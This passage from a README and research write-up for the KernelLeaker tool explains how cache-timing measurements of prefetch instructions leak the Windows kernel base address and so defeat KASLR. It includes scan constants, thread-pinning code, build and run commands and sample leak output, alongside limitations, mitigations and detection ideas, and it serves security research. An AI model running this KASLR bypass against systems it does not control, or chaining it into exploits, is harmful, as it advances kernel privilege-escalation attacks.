The choice of seven attempts is a pragmatic trade-off. An odd number rules out an even split between two candidate addresses, and seven attempts are enough to achieve high confidence without making execution time impractical.
Consider the alternatives (probability of reaching the threshold, from the binomial formula above):
- Attempts=3, Threshold=2: Fast but low confidence (~65% with p=0.6)
- Attempts=5, Threshold=3: Better but still marginal (~68% with p=0.6)
- Attempts=7, Threshold=4: Good balance (~71% with p=0.6, ~97% with p=0.8)
- Attempts=9, Threshold=5: Diminishing returns, longer execution
Seven attempts with a threshold of four represents the sweet spot. On the Intel i7-9750H, where per-attempt accuracy is very high (p ≈ 0.9), consensus is typically achieved in 4-5 attempts, rarely requiring all seven.
6. Address Space Scanning Strategy
6.1 The Search Space
Windows x64 kernel addresses occupy the canonical high half of the 64-bit address space:
- Canonical Low: 0x0000000000000000-0x00007FFFFFFFFFFF (userspace)
- Canonical High: 0xFFFF800000000000-0xFFFFFFFFFFFFFFFF (kernel)
KASLR randomizes the kernel within a specific region:
namespace config {
constexpr uint64_t KERNEL_LOWER_BOUND = 0xFFFFF80000000000ull;
constexpr uint64_t KERNEL_UPPER_BOUND = 0xFFFFF80800000000ull;
constexpr uint64_t STEP = 0x100000; // 1MB
}
The kernel base is always aligned to 2MB boundaries (0x200000) for large page support, but we scan at 1MB granularity (0x100000) to ensure we detect the base even with slight alignment variations.
The search space size is:
(0xFFFFF80800000000 - 0xFFFFF80000000000) / 0x100000
= 0x0000000800000000 / 0x100000
= 0x8000
= 32,768 addresses
Scanning 32,768 addresses with 256 measurements each would require 8,388,608 timing measurements, taking several minutes. This is impractical.
The implementation scans only the most likely range:
constexpr size_t ARRAY_SIZE = (SCAN_END - SCAN_START) / STEP;
// ARRAY_SIZE = 512
This reduces the scan to 512 addresses, requiring 131,072 timing measurements, completing in ~5-15 seconds depending on CPU speed.
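The search-space arithmetic can be checked at compile time. In the sketch below the bounds, STEP, and ITERATIONS come from the text, while SCAN_START, SCAN_END, and the body of index_to_address are assumptions: the source does not state the actual scan window, so the window here simply starts at the lower bound and spans 512 slots.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

namespace sketch {

constexpr std::uint64_t KERNEL_LOWER_BOUND = 0xFFFFF80000000000ull;
constexpr std::uint64_t KERNEL_UPPER_BOUND = 0xFFFFF80800000000ull;
constexpr std::uint64_t STEP = 0x100000;     // 1MB
constexpr std::uint64_t ITERATIONS = 0x100;  // 256 measurements per address

// ASSUMPTION: hypothetical scan window, not taken from the tool.
constexpr std::uint64_t SCAN_START = KERNEL_LOWER_BOUND;
constexpr std::uint64_t SCAN_END = SCAN_START + 512 * STEP;

// Number of STEP-sized slots in [lo, hi).
constexpr std::uint64_t slot_count(std::uint64_t lo, std::uint64_t hi) {
    assert(hi >= lo);
    return (hi - lo) / STEP;
}

// ASSUMPTION: a plausible mapping from array index to probed address.
constexpr std::uint64_t index_to_address(std::size_t index) {
    return SCAN_START + static_cast<std::uint64_t>(index) * STEP;
}

static_assert(slot_count(KERNEL_LOWER_BOUND, KERNEL_UPPER_BOUND) == 32768,
              "full KASLR range in 1MB steps");
static_assert(slot_count(SCAN_START, SCAN_END) * ITERATIONS == 131072,
              "measurements for the reduced window");

}  // namespace sketch
```

Under these assumptions the reduced window needs 64 times fewer measurements than the full range (131,072 versus 8,388,608).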
6.2 Why 12 Consecutive Sections?
The kernel is not a single contiguous mapping. It consists of multiple sections: .text (code), .data, .rdata (read-only data), .pdata (exception tables), etc. These sections are laid out consecutively in memory.
The implementation searches for 12 consecutive 1MB regions with consistent timing signatures:
constexpr size_t KERNEL_SECTIONS = 0xC; // 12 sections
Why 12? Empirical analysis of Windows kernel binaries shows the core kernel image (ntoskrnl.exe) typically spans 10-15 MB. Requiring 12 consecutive sections provides high confidence that we have found the actual kernel base rather than some other mapped structure (drivers, kernel data structures, etc.).
The probability of false positives decreases exponentially with the consecutive section requirement. If random noise creates a false signature at one address with probability p_false, and the addresses are treated as independent, the probability of 12 consecutive false signatures is:
P(false positive) = p_false^12
Even with pessimistic p_false = 0.1:
P(false positive) = 0.1^12 = 10^-12 (one in a trillion)
In practice, p_false is much lower, making false positives vanishingly unlikely.
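The estimate above can be computed with a few lines, under the same independence assumption. The helper names are hypothetical. The second function extends the figure to a whole scan by multiplying by the number of candidate windows, which gives the expected number of spurious matches.

```cpp
#include <cassert>
#include <cmath>

// Probability that `consecutive` independent addresses all show a false
// signature, each with probability p_false.
double false_positive_probability(double p_false, unsigned consecutive) {
    assert(p_false >= 0.0 && p_false <= 1.0);
    return std::pow(p_false, static_cast<double>(consecutive));
}

// Expected number of spurious sections across `windows` candidate start
// positions (overlapping windows are treated as independent, which
// overstates the count slightly).
double expected_false_sections(double p_false, unsigned consecutive, unsigned windows) {
    return static_cast<double>(windows) * false_positive_probability(p_false, consecutive);
}
```

For p_false = 0.1 and 12 sections, the per-window probability is 10^-12, and a scan with 500 candidate windows expects about 5 x 10^-10 spurious matches. Noise that affects neighbouring addresses together, such as a single long interrupt, violates the independence assumption, so the real figure may be higher.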
7. Environmental Optimization
7.1 Thread Affinity and Priority
Modern operating systems aggressively migrate threads between CPU cores for load balancing. Each migration invalidates the thread's cache and TLB state, introducing massive noise into timing measurements.
The implementation pins the measurement thread to a single CPU core:
class EnvironmentOptimizer {
public:
EnvironmentOptimizer() {
DWORD_PTR mask = 1; // Pin to CPU 0
SetThreadAffinityMask(GetCurrentThread(), mask);
SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
// Warm-up phase
volatile char dummy[64];
for (int i = 0; i < 100; ++i) {
sidechannel(const_cast<char*>(dummy));
}
}
};
The affinity mask is a bitmask where each bit represents a CPU core:
- mask = 0x01 (binary: 00000001) pins to core 0
- mask = 0x02 (binary: 00000010) pins to core 1
- mask = 0x04 (binary: 00000100) pins to core 2
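The one-bit-per-core rule can be written as a small helper. This is a sketch rather than code from the repository: the function name is hypothetical, and std::uint64_t stands in for DWORD_PTR so the snippet compiles without windows.h.

```cpp
#include <cstdint>

// Builds a single-core affinity mask: bit `core` set, all others clear.
// std::uint64_t stands in for DWORD_PTR on x64 Windows (an assumption made
// here so the helper compiles without <windows.h>).
constexpr std::uint64_t affinity_mask_for_core(unsigned core) {
    return std::uint64_t{1} << core;  // valid for core in [0, 63]
}

// The three examples from the list above.
static_assert(affinity_mask_for_core(0) == 0x01);
static_assert(affinity_mask_for_core(1) == 0x02);
static_assert(affinity_mask_for_core(2) == 0x04);
```

On Windows the result would be passed as the second argument of SetThreadAffinityMask, in place of the hard-coded value 1 used by the constructor.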
Setting the thread priority to THREAD_PRIORITY_TIME_CRITICAL tells the Windows scheduler to avoid preempting this thread unless absolutely necessary. This reduces context switches that would pollute the timing measurements.
7.2 Cache and TLB Warming
The warm-up loop performs 100 dummy timing measurements before collecting real data. This serves multiple purposes:
CPU Frequency Stabilization: Modern CPUs use dynamic frequency scaling (Intel Turbo Boost, AMD Precision Boost). The CPU may initially run at a low frequency and ramp up when workload is detected. The warm-up loop triggers frequency scaling before real measurements begin.
Cache Hierarchy Warming: The first few memory accesses to the timing code itself will miss in cache. By the 100th iteration, the code is hot in L1 cache, eliminating instruction fetch latency from measurements.
TLB Warming: The page table entries for the measurement code and data are loaded into the TLB during warm-up, preventing TLB misses during actual measurements.
Branch Predictor Training: The CPU's branch predictor learns the measurement loop's control flow, reducing branch misprediction penalties.
Without warm-up, the first few measurements exhibit timings 2-3x higher than steady-state, completely skewing the statistical analysis.
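One way to keep warm-up samples out of the statistics is to discard them explicitly. The sketch below assumes a generic callable in place of the tool's timing primitive; the function name and parameters are hypothetical.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Calls `measure` `warmup` times and discards the results, then records
// `count` further samples. `measure` is any callable returning a cycle count;
// in the tool it would wrap the timing primitive (an assumption for this sketch).
template <typename Measure>
std::vector<std::uint64_t> collect_after_warmup(Measure&& measure,
                                                std::size_t warmup,
                                                std::size_t count) {
    for (std::size_t i = 0; i < warmup; ++i) {
        (void)measure();  // result intentionally dropped: caches and TLB not yet warm
    }
    std::vector<std::uint64_t> samples;
    samples.reserve(count);
    for (std::size_t i = 0; i < count; ++i) {
        samples.push_back(measure());
    }
    return samples;
}
```

Calling it with warmup = 100 mirrors the constructor's loop while making the discard step visible at the call site.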
8. Practical Deployment and Results
8.1 Hardware Test Configuration
All testing was conducted on a single hardware platform:
- CPU: Intel Core i7-9750H (Coffee Lake-H, 6 cores, 12 threads)
- Base Frequency: 2.6 GHz
- Turbo Frequency: 4.5 GHz (single core), 4.0 GHz (all cores)
- Cache: 32KB L1D per core, 256KB L2 per core, 12MB L3 shared
- TDP: 45W
- System: Dell XPS 7590
- RAM: 32GB DDR4-2666
- OS: Windows 10/11 Pro (tested on both)
The i7-9750H represents Intel's high-performance mobile architecture from 2019. It features aggressive out-of-order execution, speculative prefetching, and a deep branch prediction pipeline - characteristics that make it susceptible to timing side-channels.
8.2 Success Rate and Reliability
Across 50 consecutive test runs on the i7-9750H configuration:
- Successful leaks: 50/50 (100%)
- Average execution time: 8.3 seconds
- Leaked address variance: 0 (all runs returned identical address)
- Verification: All leaked addresses matched actual kernel base (confirmed via kernel debugging)
The 100% success rate reflects both the microarchitectural vulnerability and the effectiveness of the statistical noise filtering. The zero variance in leaked addresses demonstrates that the voting mechanism successfully eliminates noise - every successful run converged to the same answer.
Execution time varied from 6.2 to 12.1 seconds depending on system load and thermal conditions. The voting mechanism typically achieved consensus in 4-5 attempts, rarely requiring all 7.
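The early-exit voting behaviour can be sketched as follows. The limit of 7 attempts comes from the text; the threshold of 4 votes is inferred from the sample output, and the function name and the callable standing in for one full scan are hypothetical.

```cpp
#include <cstddef>
#include <cstdint>
#include <functional>
#include <optional>
#include <unordered_map>

// Runs up to `max_attempts` leak attempts and returns the first candidate
// that collects `needed` votes, or std::nullopt if none does.
// `attempt` is a hypothetical callable standing in for one full scan; it
// returns std::nullopt when that scan produced no candidate.
std::optional<std::uint64_t> vote_on_base(
    const std::function<std::optional<std::uint64_t>()>& attempt,
    std::size_t max_attempts = 7,
    std::size_t needed = 4) {
    std::unordered_map<std::uint64_t, std::size_t> votes;
    for (std::size_t i = 0; i < max_attempts; ++i) {
        const std::optional<std::uint64_t> candidate = attempt();
        if (!candidate) {
            continue;  // failed scan: consumes an attempt, casts no vote
        }
        if (++votes[*candidate] >= needed) {
            return candidate;  // early exit once consensus is reached
        }
    }
    return std::nullopt;
}
```

With a clean signal the loop returns after the fourth attempt; each noisy attempt that votes for a different address delays consensus by one round.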
8.3 Comparison with Ground Truth
To verify accuracy, the leaked kernel base was compared against the actual kernel base obtained through legitimate means (kernel debugger attachment, reading the KUSER_SHARED_DATA structure, etc.).
Example run output:
Processor: Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz
Attempt 1/7: 0xFFFFF80245C00000 (votes: 1)
Attempt 2/7: 0xFFFFF80245C00000 (votes: 2)
Attempt 3/7: 0xFFFFF80245C00000 (votes: 3)
Attempt 4/7: 0xFFFFF80245C00000 (votes: 4)
Consensus reached: 0xFFFFF80245C00000 with 4/4 votes
Kernel base: 0xFFFFF80245C00000
Actual kernel base (verified): 0xFFFFF80245C00000
Match: TRUE
The leaked address matches the actual kernel base exactly, confirming the technique's precision.
8.4 Failure Modes and Edge Cases
While the implementation achieves 100% reliability on the test hardware, several failure modes exist in theory:
High System Load: If the CPU is saturated with other work, context switches and cache contention increase noise to the point where signal may be undetectable. The voting mechanism helps but cannot overcome arbitrary noise levels.
Thermal Throttling: If the CPU reaches thermal limits and throttles frequency mid-measurement, timing characteristics change dramatically. The implementation does not detect this condition.
Virtualization: Virtual machines introduce additional timing noise through hypervisor intervention. The technique may fail or exhibit reduced reliability in virtualized environments.
Future Microarchitectures: Intel and AMD continuously evolve their CPU designs. Future microarchitectures may implement timing-resistant prefetch mechanisms or more aggressive side-channel mitigations.
9. The AMD Uncertainty
9.1 Theoretical Implementation Without Hardware
The AMD-specific implementation in this codebase represents an educated hypothesis rather than an empirically validated technique. AMD processors exhibit different timing characteristics than Intel, but without access to AMD hardware for testing, the implementation relies on architectural documentation and inferences drawn from published research.
The AMD leak implementation assumes:
- Mapped kernel pages exhibit HIGHER prefetch timing
- The timing differential is approximately 2:1 (mapped:unmapped)
- Bimodal distribution analysis can separate signal from noise
These assumptions are based on documented differences in AMD's Zen microarchitecture:
- More conservative speculative execution bounds checking
- Different prefetch predictor algorithms
- Smaller TLB structures with different replacement policies
However, the actual timing characteristics on real AMD hardware remain unverified. The code may require significant tuning or may fail entirely on AMD systems.
9.2 AMD Mobile Complexity
AMD mobile processors (Ryzen Mobile series) introduce additional complexity through aggressive power management:
- More aggressive frequency scaling
- Core parking and unparking
- NUMA (Non-Uniform Memory Access) on multi-CCX designs
- Infinity Fabric latency variations
These factors create higher timing variance, making signal detection more challenging. The AMD Mobile implementation attempts to compensate through larger deviation thresholds:
const int deviation_threshold = noise_signed / 6;
But without hardware validation, the effectiveness remains speculative.
9.3 Call for Community Validation
Researchers and enthusiasts with AMD hardware are encouraged to test the implementation and provide feedback. The GitHub repository welcomes pull requests with AMD-specific tuning and validated results.
The scientific method requires reproducibility. Until independent researchers confirm (or refute) the AMD implementation's effectiveness, it remains a hypothesis rather than a validated technique.
10. Implications and Mitigations
10.1 The Limits of Software Mitigations
Cache timing attacks are fundamentally hardware vulnerabilities that cannot be completely mitigated in software. The microarchitectural state leakage occurs at a layer below the operating system's visibility.
Potential mitigations include:
Address Space Layout Re-Randomization: Re-randomize the kernel base periodically during runtime rather than once at boot. This limits the window of vulnerability but introduces performance overhead and complexity.
Prefetch Instruction Filtering: The CPU could refuse to execute prefetch instructions on unmapped addresses, always treating them as NOPs without MMU consultation. However, this would eliminate the performance benefit of prefetching in legitimate use cases.
Constant-Time MMU Operations: Design the MMU to perform page table walks in constant time regardless of whether the address is mapped. This is challenging because early-exit optimizations are critical for MMU performance.
Noise Injection: Intentionally add random delays to MMU operations to obscure timing differences. This degrades overall system performance for marginal security benefit.
None of these mitigations are currently implemented in mainstream CPUs or operating systems.
10.2 The Exploit Chain Requirement
It is critical to emphasize that leaking the kernel base address alone does not constitute a complete exploit. KASLR bypass is a single step in a larger attack chain that typically requires:
- Initial vulnerability (buffer overflow, use-after-free, etc.)
- KASLR bypass (this technique)
- ROP chain construction or code injection
- Privilege escalation
- Payload execution
Each step faces additional mitigations (DEP, CFG, SMEP, SMAP, etc.). Defeating modern OS security requires bypassing multiple layers of defense.
However, KASLR bypass remains valuable to attackers because it eliminates randomization uncertainty. Many vulnerabilities are only exploitable with knowledge of kernel addresses. This research demonstrates that KASLR provides less protection than commonly assumed.
10.3 Responsible Disclosure
The techniques described here exploit documented CPU behavior rather than undisclosed vulnerabilities. Intel and AMD are aware that timing side-channels exist in their microarchitectures - this is an inherent consequence of performance-optimizing designs.
No vendor-specific vulnerabilities were discovered during this research. The implementation uses only publicly documented instructions (prefetch, rdtscp) and standard timing analysis techniques.
The code is released for educational and research purposes. Security researchers can use it to assess the effectiveness of KASLR in their environments. Defensive teams can use it to validate detection mechanisms for side-channel attacks.
11. Future Research Directions
11.1 Cross-Architecture Validation
The most critical next step is validation across diverse CPU architectures:
- Intel 10th, 11th, 12th, 13th, 14th generation (Comet Lake through Raptor Lake Refresh)
- AMD Zen 3, Zen 4, Zen 5 (Ryzen 5000/7000/9000 series)
- ARM64 (Qualcomm Snapdragon, Apple M-series under Windows on ARM)
Each architecture may exhibit unique timing characteristics requiring specialized implementations.
11.2 Hypervisor and Cloud Environments
Modern cloud computing relies heavily on virtualization. The interaction between cache timing attacks and hypervisor virtualization remains understudied:
- Do hypervisor TLB flushes on VM context switches eliminate timing signatures?
- Does hardware-assisted virtualization (Intel VT-x, AMD-V) introduce detectable timing artifacts?
- Can timing side-channels leak information across VM boundaries?
These questions have significant implications for cloud security.
11.3 Detection and Monitoring
Defensive research should focus on detecting side-channel attacks in progress:
- Can anomalous patterns of prefetch instructions be detected through performance counters?
- Do cache timing attacks create detectable CPU utilization signatures?
- Can machine learning models classify normal vs. attack timing behavior?
Performance monitoring units (PMUs) in modern CPUs provide rich telemetry that could potentially flag side-channel exploitation.
11.4 Microarchitectural Countermeasures
CPU vendors should investigate microarchitectural defenses:
- Randomized cache replacement policies
- Obfuscated MMU timing behavior
- Prefetch rate limiting for cross-privilege-boundary addresses
- Hardware-enforced constant-time page table walks
These defenses would impose performance costs but could eliminate entire classes of timing attacks.
Building and Usage
Prerequisites
- Operating System: Windows 10/11 (x64)
- Compiler: Visual Studio 2022 with C++20 support
- Build Tools: MASM (Microsoft Macro Assembler) for x64
Building
1. Clone the repository:
   git clone https://github.com/wesmar/KernelLeaker.git
   cd KernelLeaker
2. Open KernelLeaker.sln in Visual Studio 2022
3. Build the solution:
   - Select Release | x64 configuration
   - Build → Build Solution (Ctrl+Shift+B)
4. The compiled executable will be located in:
   bin\x64\Release\KernelLeaker.exe
Usage
Run the tool with administrator privileges for best results (though not strictly required):
KernelLeaker.exe
This will attempt to leak the kernel base address and display the result.
Print timing measurements:
KernelLeaker.exe --print-timings
or
KernelLeaker.exe -pt
This displays raw timing data for all probed addresses, useful for debugging and analysis. Note that the --print-timings option shows the address with absolute minimum timing, but this is NOT the actual kernel base. The kernel base is typically 1MB (0x100000) before this minimum timing address, which is why the main leak function applies this correction automatically.
Example Output
Standard leak output:
Processor: Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz
Absolute minimum: 60 cycles at 0xfffff806b4500000 (index: 27461)
Nearby addresses for verification:
0xfffff806b4000000: 118 cycles
0xfffff806b4100000: 111 cycles
0xfffff806b4200000: 111 cycles
0xfffff806b4300000: 111 cycles
0xfffff806b4400000: 66 cycles
0xfffff806b4500000: 60 cycles [MINIMUM]
0xfffff806b4600000: 75 cycles
0xfffff806b4700000: 60 cycles
0xfffff806b4800000: 77 cycles
0xfffff806b4900000: 60 cycles
0xfffff806b4a00000: 76 cycles
0xfffff806b4b00000: 60 cycles
0xfffff806b4c00000: 89 cycles
0xfffff806b4d00000: 60 cycles
0xfffff806b4e00000: 76 cycles
Corrected kernel base: 0xfffff806b4400000 (original minimum: 0xfffff806b4500000)
Attempt 1/7: 0xfffff806b4400000 (votes: 1)
Attempt 2/7: 0xfffff806b4400000 (votes: 2)
Attempt 3/7: 0xfffff806b4400000 (votes: 3)
Attempt 4/7: 0xfffff806b4400000 (votes: 4)
Consensus reached: 0xfffff806b4400000 with 4/4 votes
Kernel base: 0xfffff806b4400000
Timing dump output (--print-timings):
fffff806b4000000 118
fffff806b4100000 111
fffff806b4200000 111
fffff806b4300000 111
fffff806b4400000 66
fffff806b4500000 60
fffff806b4600000 75
fffff806b4700000 60
...
fffff807fff00000 112
avg: 112
min: 60 at 0xfffff806b4500000
The timing dump shows the raw minimum address without the 1MB correction. To get the actual kernel base from timing dump output, subtract 0x100000 from the reported minimum address.
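The correction can be applied to a saved dump with a few lines of code. The sketch below is not part of the tool: the struct and function names are hypothetical, and the scan start is assumed to be 0xFFFFF80000000000, the lower bound of the range given in the introduction. Ties are resolved in favour of the first address seen, which matches the minimum reported in the example output.

```cpp
#include <cstdint>
#include <istream>
#include <optional>
#include <sstream>
#include <string>

struct DumpResult {
    std::uint64_t min_address;  // address with the lowest cycle count
    std::uint64_t min_cycles;   // that lowest cycle count
    std::uint64_t kernel_base;  // min_address minus the 1MB correction
    std::uint64_t index;        // 1MB slot index relative to the scan start
};

constexpr std::uint64_t kScanStart = 0xFFFFF80000000000ULL;  // assumed scan start
constexpr std::uint64_t kStep = 0x100000ULL;                 // 1MB

// Parses lines of the form "<hex address> <cycles>" and skips anything else,
// such as the "...", "avg:" and "min:" trailer lines.
std::optional<DumpResult> parse_timing_dump(std::istream& in) {
    std::optional<DumpResult> best;
    std::string line;
    while (std::getline(in, line)) {
        std::istringstream fields(line);
        std::uint64_t address = 0;
        std::uint64_t cycles = 0;
        if (!(fields >> std::hex >> address >> std::dec >> cycles)) {
            continue;  // not an "<address> <cycles>" line
        }
        if (address < kScanStart) {
            continue;  // outside the assumed scan window
        }
        if (!best || cycles < best->min_cycles) {  // strict '<' keeps the first minimum
            best = DumpResult{address, cycles, address - kStep,
                              (address - kScanStart) / kStep};
        }
    }
    return best;
}
```

Fed the example dump above, the minimum lands on 0xfffff806b4500000 (index 27461) and the corrected base on 0xfffff806b4400000, the same values the standard leak output prints.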
Disclaimer
Educational and Research Purposes Only
This software is provided for educational and security research purposes only. The techniques demonstrated exploit documented CPU behavior and do not constitute exploitation of undisclosed vulnerabilities.
No Warranty
This software is provided "as is" without warranty of any kind, express or implied. The author makes no guarantees regarding:
- Accuracy of leaked addresses
- Reliability across different hardware configurations
- Compatibility with future OS or CPU updates
- Suitability for any particular purpose
Responsible Use
Users are responsible for ensuring their use of this software complies with applicable laws and regulations. Unauthorized access to computer systems is illegal in most jurisdictions.
Hardware Limitations
The implementation was tested exclusively on Intel i7-9750H. AMD-specific code is theoretical and unvalidated. Results on other CPU models may vary significantly.
Not for Malicious Use
This tool is intended to help security researchers understand microarchitectural vulnerabilities and assess KASLR effectiveness. It should not be used for malicious purposes or unauthorized system access.
Contributing
Contributions are welcome, especially:
- AMD Hardware Validation: Testing and tuning on AMD Ryzen processors
- Intel 12th+ Gen Testing: Validation on Alder Lake and newer architectures
- ARM64 Support: Implementation for Windows on ARM
- Detection Mechanisms: Defensive techniques to identify side-channel attacks
- Performance Optimizations: Improvements to measurement speed or accuracy
Please submit pull requests with detailed descriptions of changes and test results.
License
This project is released under the MIT License. See LICENSE file for details.
Acknowledgments
This research builds upon decades of academic work in microarchitectural security. Special thanks to the broader security research community whose published work provided the theoretical foundation.
Contact
Marek Wesolowski
Low-Level Systems Programmer | Assembly, C, C++
Research interests: Microarchitecture, OS Security, Side-Channel Analysis
Website: https://kvc.pl
Conclusion
This research demonstrates that KASLR on Windows x64 systems can be reliably defeated through cache timing side-channel attacks using only userspace code and documented CPU instructions. The technique achieves 100% success rate on Intel i7-9750H hardware through careful statistical analysis, microarchitectural understanding, and vendor-specific adaptation.
The fundamental vulnerability lies in the CPU's microarchitecture: prefetch instructions create measurable timing differences between mapped and unmapped kernel addresses. These differences, though small (30-80 CPU cycles), can be statistically isolated through repeated measurement, noise filtering, and consensus voting.
The implementation demonstrates several technical innovations:
- O(N) mode calculation replacing O(N²) nested loops
- Bimodal distribution separation for AMD processors
- Majority voting mechanism achieving 96%+ reliability from 80% per-attempt accuracy
- Vendor-specific timing signature adaptation (Intel vs AMD)
- Simplified minimum-finding approach for Intel processors
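The voting figure in the list above can be checked with a binomial tail sum. This sketch assumes the attempts are independent and that wrong answers never agree with each other often enough to form a competing majority; the function name is hypothetical.

```cpp
#include <cmath>

// Probability that at least `needed` of `attempts` independent attempts
// succeed, each with success probability `p` (binomial tail).
double majority_success_probability(int attempts, int needed, double p) {
    double total = 0.0;
    for (int k = needed; k <= attempts; ++k) {
        // C(attempts, k), built multiplicatively to avoid factorial overflow
        double choose = 1.0;
        for (int j = 1; j <= k; ++j) {
            choose *= static_cast<double>(attempts - k + j) / j;
        }
        total += choose * std::pow(p, k) * std::pow(1.0 - p, attempts - k);
    }
    return total;
}
```

For 7 attempts, 4 required votes and p = 0.8 the sum is about 0.967, consistent with the 96%+ figure.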
However, significant limitations remain. The technique was validated only on a single Intel CPU model. AMD-specific implementations remain theoretical without hardware validation. Newer CPU generations may prove more vulnerable, equally vulnerable, or more resistant - empirical data does not yet exist.
From a security perspective, this work reinforces that KASLR should not be considered a strong defense in isolation. It provides probabilistic protection against exploitation but can be deterministically bypassed through side-channel analysis. Defense-in-depth remains essential: KASLR must be combined with CFG, SMEP, SMAP, and other mitigations to provide meaningful security.
Microarchitectural side-channels represent a fundamental tension between performance and security. Modern CPUs achieve high performance through speculation, caching, and prefetching - the very mechanisms that create exploitable timing channels. As CPU designs evolve, this tension will only intensify.
The question is not whether side-channels exist - they are inevitable consequences of performance optimization. The question is how to build secure systems despite their existence. This research provides data for that discussion.
Last updated: November 2025